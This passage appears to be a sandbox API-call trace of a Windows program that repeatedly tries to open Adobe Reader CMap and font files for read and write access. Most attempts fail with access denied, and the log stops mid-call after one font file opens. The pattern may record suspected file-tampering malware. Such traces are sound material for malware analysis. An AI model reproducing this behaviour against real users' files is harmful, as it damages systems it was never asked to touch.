RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0084.233] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0084.233] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0084.233] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-GBpc-EUC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-gbpc-euc")) returned 0x20 [0084.234] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-3" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.704] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-3", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-3", lpFilePart=0x345f690*="Adobe-Japan1-3") returned 0x45 [0084.704] GetLastError () returned 0x5 [0084.705] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅꪀǷ\x01") returned 0x13 [0084.705] LocalFree (hMem=0x69e2b0) returned 0x0 [0084.705] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0084.705] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0084.705] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0084.705] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0084.705] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-3" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-3")) returned 0x20 [0085.215] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-Mac" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-h-mac"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.216] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-Mac", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-Mac", lpFilePart=0x345f690*="Adobe-Japan1-H-Mac") returned 0x49 [0085.216] GetLastError () returned 0x5 [0085.216] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x13 [0085.216] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.216] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.216] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0085.216] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.217] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.217] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-Mac" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-h-mac")) returned 0x20 [0085.217] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-KSCms-UHC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-kscms-uhc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.217] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-KSCms-UHC", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-KSCms-UHC", lpFilePart=0x345f690*="Adobe-Korea1-KSCms-UHC") returned 0x4d [0085.217] GetLastError () returned 0x5 [0085.217] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x13 [0085.218] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.218] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.218] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0085.218] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.218] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.218] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-KSCms-UHC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-kscms-uhc")) returned 0x20 [0085.219] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\CNS-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\cns-euc-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.219] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\CNS-EUC-V", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\CNS-EUC-V", lpFilePart=0x345f690*="CNS-EUC-V") returned 0x40 [0085.220] GetLastError () returned 0x5 [0085.220] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x13 [0085.220] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.220] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.220] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0085.220] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.221] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.221] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\CNS-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\cns-euc-v")) returned 0x20 [0085.221] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\euc-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.222] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\EUC-H", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\EUC-H", lpFilePart=0x345f690*="EUC-H") returned 0x3c [0085.222] GetLastError () returned 0x5 [0085.222] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x13 [0085.222] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.222] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.222] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0085.222] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.223] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.223] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\euc-h")) returned 0x20 [0085.223] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk-euc-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.223] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-V", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-V", lpFilePart=0x345f690*="GBK-EUC-V") returned 0x40 [0085.223] GetLastError () returned 0x5 [0085.223] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x13 [0085.223] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.224] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.224] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0085.224] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.224] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.224] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk-euc-v")) returned 0x20 [0085.224] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbpc-euc-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.224] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-V", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-V", lpFilePart=0x345f690*="GBpc-EUC-V") returned 0x41 [0085.225] GetLastError () returned 0x5 [0085.225] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x13 [0085.225] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.225] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.225] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0085.225] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.225] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.225] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbpc-euc-v")) returned 0x20 [0085.226] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKgccs-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkgccs-b5-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.226] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKgccs-B5-H", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKgccs-B5-H", lpFilePart=0x345f690*="HKgccs-B5-H") returned 0x42 [0085.226] GetLastError () returned 0x5 [0085.227] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x13 [0085.227] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.227] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.227] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0085.227] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.227] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.228] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKgccs-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkgccs-b5-h")) returned 0x20 [0085.228] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Identity-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\identity-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.228] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Identity-H", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Identity-H", lpFilePart=0x345f690*="Identity-H") returned 0x41 [0085.228] GetLastError () returned 0x5 [0085.228] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x13 [0085.228] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.229] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.229] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0085.229] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.229] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.229] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Identity-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\identity-h")) returned 0x20 [0085.230] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.230] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-V", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-V", lpFilePart=0x345f690*="KSCms-UHC-V") returned 0x42 [0085.230] GetLastError () returned 0x5 [0085.230] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x13 [0085.230] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.230] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.230] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0085.231] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.231] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.231] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-v")) returned 0x20 [0085.232] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-GBK-EUC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-gbk-euc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.232] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-GBK-EUC", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-GBK-EUC", lpFilePart=0x345f690*="UCS2-GBK-EUC") returned 0x43 [0085.232] GetLastError () returned 0x5 [0085.232] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x13 [0085.232] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.232] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.232] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0085.233] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.233] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.233] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-GBK-EUC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-gbk-euc")) returned 0x20 [0085.233] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UCS2-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unigb-ucs2-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.234] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UCS2-H", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UCS2-H", lpFilePart=0x345f690*="UniGB-UCS2-H") returned 0x43 [0085.234] GetLastError () returned 0x5 [0085.234] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x13 [0085.234] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.234] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.234] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0085.234] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.235] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.235] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UCS2-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unigb-ucs2-h")) returned 0x20 [0085.235] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UTF16-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-utf16-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.236] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UTF16-H", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UTF16-H", lpFilePart=0x345f690*="UniJIS-UTF16-H") returned 0x45 [0085.236] GetLastError () returned 0x5 [0085.236] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x13 [0085.236] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.236] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.236] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0085.237] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.237] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.237] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UTF16-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-utf16-h")) returned 0x20 [0085.237] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.238] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\V", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\V", lpFilePart=0x345f690*="V") returned 0x38 [0085.238] GetLastError () returned 0x5 [0085.238] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x13 [0085.238] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.238] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.238] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0085.238] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.239] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0085.239] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\v")) returned 0x20 [0085.239] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-regular.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0085.241] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: 